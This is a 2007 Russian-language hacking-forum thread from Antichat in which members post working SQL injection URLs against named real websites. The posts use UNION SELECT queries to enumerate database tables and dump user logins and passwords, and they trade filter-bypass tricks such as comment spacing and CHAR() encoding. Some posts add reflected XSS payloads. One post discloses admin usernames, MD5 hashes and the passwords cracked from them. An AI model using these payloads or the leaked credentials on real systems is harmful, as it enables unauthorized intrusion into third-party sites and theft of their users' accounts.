20.09.2007, 11:01
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
С нами:
10885346
Репутация:
2947
|
|
http://anime.kz/index.html
http://anime.kz/index.html?mode=links&pid=6+UNION+SELECT+1,2,3,4,5 ,6,7/*
http://anime.kz/index.html?mode=links&pid=4+union+select+1,table_n ame,3,4,5,6,7+from+INFORMATION_SCHEMA.TABLES/*
http://anime.kz/index.html?mode=links&pid=6+UNION+SELECT+1,concat( login,char(58),pwd),3,4,5,6,7+from+user+limit+1,8/*
|
|
|
20.09.2007, 15:14
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами:
9999746
Репутация:
1318
|
|
www.rusbiz.ru
Ресурс представляет из себя многоотраслевой портал с электронной торговой площадкой. Основной целью портала является содействие компаниям малого и среднего бизнеса в расширении сфер своей деятельности, увеличении объемов продаж, нахождении новых деловых связей за рубежом и проведении бизнес сделок через Интернет. Всё бы хорошо, но... Банальный SQL-Injection в параметре servid.
Получаем список таблиц:
http://www.rusbiz.ru/service_description.html?servid=-66'/**/UNION/**/SELECT/**/1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21/**/FROM/**/INFORMATION_SCHEMA.TABLES/**/LIMIT/**/X,1/*&categid=19
Получаем список полей в заданной таблице:
http://www.rusbiz.ru/service_description.html?servid=-66'/**/UNION/**/SELECT/**/1,TABLE_NAME,3,COLUMN_NAME,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME/**/IN/**/('XXX')/**/LIMIT/**/X,1/*&categid=19
* Обратите внимание на использование /**/ вместо стандартных вариантов представления пробела... Это вызвано тем, что фходной параметр фильтруется (хоть и криво). Фильтрация делает невозможным использование %20 или + в качестве пробела, также фильтруется =, поэтому пришлось воспользоваться операцией IN.
Из интересных таблиц имеем USER и forum_user, но форум по техническим причинам отключён, поэтому дело будем иметь только с первой таблицей. Таблица имеет такую структуру: - password - пароль аккаунта в md5
- user_group - группа аккаунта (может быть user, admin и т.д.)
- blocked - активированный аккаунт или нет
- lastlogin - время последнего посещения
Начнём вторжение в святая святых:
http://www.rusbiz.ru/service_description.html?servid=-66'/**/UNION/**/SELECT/**/1,CONCAT_WS(0x3a,login,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21/**/FROM/**/USER/**/WHERE/**/user_group/**/LIKE/**/'%admin%'/**/LIMIT/**/X,1/*&categid=19
По данному запросу возвращается две записи pol и systemuser. Это два админских аккаунта.
Пароли свёрнуты в md5:
pol:890a09778691261d1e1e7c65f6101d3c
systemuser:972c97bdc47dfc8def0e74c55da0bbfd
В помощь Джон и через пару секунд:
pol:51619
systemuser:explore
Ну чтож... Админы никогда не научатся проявлять фантазию при задании паролей от критических ресурсов... Должен заметить, что половина базы снимается одним проходом по словарю и прямым брутом по 0...9 в длине 8 символов.
Не знаю как быстро прикроют эту багу, ибо такое впечатление, что там админ в онлайне... Но в доказательство приведу ещё один аккаунт:
green:1604
|
|
|
|
20.09.2007, 15:23
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
С нами:
10214321
Репутация:
552
|
|
Код:
http://www.yesmag.ca/bugbeat/bugs.php?id=-8+union+select+1,2,3,4,5,VERSION(),USER()/*
|
|
|
|
20.09.2007, 15:30
|
|
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
С нами:
10531106
Репутация:
354
|
|
PHP код:
http://www.lada-auto.ru/cgi-bin/news.pl?id=-1'
|
|
|
|
20.09.2007, 17:00
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
С нами:
10787366
Репутация:
2277
|
|
cs.xeka.ru
движек - psyhostats
вот скули.. нашел почти сразу но были проблемы с выводом.. потом пошаманил с лимит 0 помогло [:
http://cs.xeka.ru/mafia/weapon.php?id=20+limit+0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19/*'
http://cs.xeka.ru/mafia/map.php?id=2+limit+0+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17/*'
тут еще много ксс, но пару лишь, нашел пока скули искал 
http://cs.xeka.ru/mafia/player.php?id=19%22%3E%3Cscript%3Ealert()%3C/script%3E
http://cs.xeka.ru/mafia/player.php?id=19\%22%3E%3Cscript%3Ealert()%3C/script%3E&weaponid=10&wsort=kills&worder=desc#hitb ox
http://cs.xeka.ru/mafia/weapon.php?id=20+limit+0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,concat_ws(0x3A,TABLE_SCHEMA,TABL E_NAME,COLUMN_NAME),15,16,17,18,19+from+informatio n_schema.columns/*'
много столбцов)
вывод всякой инфи
http://cs.xeka.ru/mafia/weapon.php?id=20+limit+0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,concat_ws(0x3A,version(),databas e(),user()),15,16,17,18,19/*'
5.0.45-community-nt-log  s_mafia:root@localhost
http://cs.xeka.ru/mafia/weapon.php?id=20+limit+0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,concat_ws(0x3A,username,password ,nickname),15,16,17,18,19+from+amx.amx_amxadmins/*'
1 STEAM_0:1:пароли сказали потереть::belo4ka 1 2% 3 12.00
2 АЙ-ПИ::LeXXXuS 1 2% 3 12.00
3 АЙ-ПИ::Admir@L 1 2% 3 12.00
4 АЙ-ПИ::belo4ka 1 2% 3 12.00
http://cs.xeka.ru/mafia/weapon.php?id=20+limit+0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,concat_ws(0x3A,username,password ,level),15,16,17,18,19+from+amx.amx_webadmins/*'
belo4ka:пароли сказали потереть:1
http://cs.xeka.ru/mafia/weapon.php?id=20+limit+0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,concat_ws(0x3A,username,password ,accesslevel),15,16,17,18,19+from+ps_mafia.pstats_ plr_profile/*'
1 :пароли сказали потереть:1 1 2% 3 12.00
2 :пароли сказали потереть:10 1 2% 3 12.00
з.ы. вывод понравился так как там была таблица не надо было тянуть по одной))
з.з.ы движек сегодня увидел первый раз.. мо там есть еще что-то поинтереснее но рыть особо не стал [:
з.з.ы ися был осведомлен)
з.з.ы потер пароли и мыла
Последний раз редактировалось halkfild; 20.09.2007 в 17:12..
|
|
|
|
21.09.2007, 13:58
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами:
9999746
Репутация:
1318
|
|
vodnyy.odessa.ua
http://vodnyy.odessa.ua/lists/company.phtml?site=vo&sample_id=-1874+UNION+SELECT+T.L,T.P,'cracked by groundhog',4+FROM+(SELECT+ROWNUM+R,LOGIN+L,PASSWD+ P+FROM+CO_USERS)+T+WHERE+R=X+--+
|
|
|
|
21.09.2007, 20:33
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
С нами:
9874372
Репутация:
138
|
|
Код:
http://www.vkus.by/index.php?n=-1+union+select+1,2,3,4,5,6/*
MySQL : 4 версия |
|
|
|
22.09.2007, 03:38
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
С нами:
10669286
Репутация:
1942
|
|
"раскрутил" скулю Slider'a "попроще"
сразу говорю сорри, когда раскручивал не видел что слайдер сам уже раскрутил..
Код:
http://anime.kz/index.html?mode=links&pid=6+UNION+SELECT+1,login,3,4,pwd,6,7+from+user/*
+ своя:
Код:
http://www.borytucholskie.pl/index.php?id=-1+union+select+1,password+from+users/*
пароль, логин - ненашёл 
Код:
http://www.borytucholskie.pl/index.php?id=-1+union+select+1,column_name+from+INFOrMATION_SCHEMA.COLUMnS+WHERE+TABLE_NAME=users+limit+0,1/*
http://www.borytucholskie.pl/index.php?id=-1+union+select+1,column_name+from+INFOrMATION_SCHEMA.COLUMnS+WHERE+TABLE_NAME='users'+limit+0,1/*
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /index.php on line 10
|
|
|
|
22.09.2007, 05:36
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
2BlackCats
Код:
http://www.borytucholskie.pl/index.php?id=-1+union+select+1,column_name+from+INFOrMATION_SCHEMA.COLUMnS+WHERE+TABLE_NAME=CHAR(117,115,101,114,115)+limit+1,1/*
кавычки фильтруются 
__________________
Карфаген должен быть разрушен...
|
|
|
|
22.09.2007, 06:14
|
|
Banned
Регистрация: 16.09.2007
Сообщений: 15
С нами:
9816344
Репутация:
1
|
|
Scipio, хм, я не пойму как вы из этого извлекаете логин и пароль? У меня вот появилось в середине страницы:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /index.php on line 10
А как из этого пользу извлечь не пойму( объясни плз. |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
